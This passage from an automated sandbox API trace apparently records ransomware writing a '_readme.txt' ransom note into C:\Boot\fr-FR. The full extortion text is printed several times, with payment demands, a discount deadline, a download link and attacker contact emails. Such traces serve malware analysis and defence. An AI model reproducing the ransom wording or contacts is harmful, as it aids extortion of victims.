lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.806] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.807] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.807] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.807] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.807] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.807] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.807] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.807] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.807] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.807] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.807] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.807] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.807] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.807] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.807] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.807] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.807] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.807] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.807] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.807] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.807] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.807] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.807] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.807] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.807] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.807] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.807] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.807] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.807] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.807] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.807] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.807] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.807] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.807] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.807] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.807] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.807] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.807] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.807] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.807] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.807] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.808] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.808] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.808] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.808] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.808] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.808] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.808] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.808] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.808] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.808] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.808] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.808] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.808] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.808] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.808] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.808] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.808] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.808] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.808] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.808] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.808] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.808] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.808] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.808] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.808] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.808] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.808] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.808] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.808] PathFindFileNameW (pszPath="C:\\Boot\\fr-FR\\") returned="fr-FR\\" [0090.808] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.808] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.808] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0090.808] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.808] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0090.808] PathFindFileNameW (pszPath="") returned="" [0090.808] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.808] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0090.809] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0090.809] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x800) returned 0x31d1120 [0090.809] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x31d1120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0090.809] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x810) returned 0x99c9c68 [0090.809] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.809] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.809] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.809] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.809] FreeLibrary (hLibModule=0x75670000) returned 1 [0090.809] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.809] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d1120 | out: hHeap=0x680000) returned 1 [0090.809] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.809] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.809] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x81c) returned 0x99c9c68 [0090.809] PathAppendW (in: pszPath="C:\\Boot\\fr-FR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned 1 [0090.809] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.810] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.810] PathFileExistsW (pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned 0 [0090.810] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x7d00) returned 0x99f52d8 [0090.810] lstrcpyW (in: lpString1=0x99f52d8, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda" [0090.810] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda", lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" [0090.810] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99cad78 [0090.810] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\_readme.txt" (normalized: "c:\\boot\\fr-fr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0090.811] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8b0) returned 0x31cf750 [0090.811] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x857) returned 0x3189d50 [0090.811] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x3189d50, cbMultiByte=2135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 1112 [0090.811] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x316f0d0 [0090.811] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3189d50 | out: hHeap=0x680000) returned 1 [0090.811] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.811] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned 1111 [0090.811] WriteFile (in: hFile=0x5cc, lpBuffer=0x316f0d0*, nNumberOfBytesToWrite=0x457, lpNumberOfBytesWritten=0x9ccfb64, lpOverlapped=0x0 | out: lpBuffer=0x316f0d0*, lpNumberOfBytesWritten=0x9ccfb64*=0x457, lpOverlapped=0x0) returned 1 [0090.812] CloseHandle (hObject=0x5cc) returned 1 [0090.812] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316f0d0 | out: hHeap=0x680000) returned 1 [0090.812] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99cad78 | out: hHeap=0x680000) returned 1 [0090.812] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f52d8 | out: hHeap=0x680000) returned 1 [0090.812] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.813] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.813] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa3300420, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3300420, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0090.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.813] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa3300420, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3300420, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.813] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0090.813] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3300420, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa3300420, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3326580, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0090.813] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3300420, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa3300420, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3326580, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0090.813] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0090.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef28 | out: hHeap=0x680000) returned 1 [0090.813] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef28 [0090.813] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0090.813] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.813] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.813] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.813] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.813] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.813] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.814] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.814] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.814] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.814] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.814] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.814] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.814] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.814] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.814] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.814] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.814] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.814] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.814] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.814] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.814] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 